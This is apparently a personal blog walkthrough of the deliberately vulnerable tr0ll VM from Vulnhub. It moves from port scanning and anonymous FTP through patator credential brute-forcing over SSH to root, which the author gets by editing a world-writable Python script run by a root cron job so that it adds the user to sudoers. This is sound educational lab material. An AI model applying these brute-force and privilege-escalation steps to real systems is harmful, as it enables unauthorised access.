tr0ll VM Walkthrough

for the tr0ll VM hosted on Vulnhub from Maleus.

catch me if you can logo image

First off, nmap found the following ports open:

nmap finds ports 21, 22 and 80 open

So there’s a port 80 open, but before we visit that we check that ports 21 and 22 are secured, but surprisingly port 21 (FTP) is unauthenticated! from searching the packets we find a lol.pcap file:

ftp shows a file

When we open this in Wireshark we find the following message:

wireshark message

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close… gotta TRY HARDER!

So sup3rs3cr3tdirlol may be a clue to something but we don’t know what yet, and there’s nothing else of any use in the packet capture file, so let’s investigate port 80 through the web browser.

This contains a trollface image with no exif data and just static code in the source, so let’s scan port 80 through nikto:

robots found by nikto

Nikto finds a robots.txt file disallowing a secret dir, so we visit that but just find another trol image, still with no exif data. So we revisit that message we found in the lol.pcap file and visit that through the browser, and this time we find a directory listing

directory listing

We run the file command on it to see what we can see:

file info

This shows us that the file is a 32-bit executable, but I run a 64-bit VM, so first I have to get it ready to execute 32bit executables with this step:

dpkg –add-architecture i386

apt-get update

apt-get install lib32z1 lib32ncurses5 lib32stdc++6

so now we can execute it and it prints a message:

file prints some hex

we visit this in the browser and find another dir listing:

listing shows 2 directories

these look like they contain possible usernames and a password:

usernames list

password

trying patator to log in with these doesn’t work, but because this is a troll VM, I then try Pass.txt in patator which works with the overflow username. In between unsuccessful attempts however, the VM bans my local IP and I have to deactivate and reactivate the network connection to get a new IP to try again.

Once we ssh into the machine, we find out that every so often it kicks us out with a message, so we check the cronlog:

cronlog shows one entry

A Python file looks hopeful, and that same file showed up with world-writeable permissions, so let’s have a look at that:

python script cleans temp folder

So what we want is to get root access and editing this python file will give us that, since it runs as root. I amend it to add the overflow user to the sudoers file (although in reality at this point there are many many ways to get root, it’s worth looking through other walkthroughs after you finish the VM, find this point in them and see what solution everyone else came up with!)

adds user to sudoers file

So we wait until the VM kicks us out which shows when the cron job was run, and ssh back in as the overflow user. Then we use sudo su and voila! we now have root access.

flag achieved

Written on December 2, 2016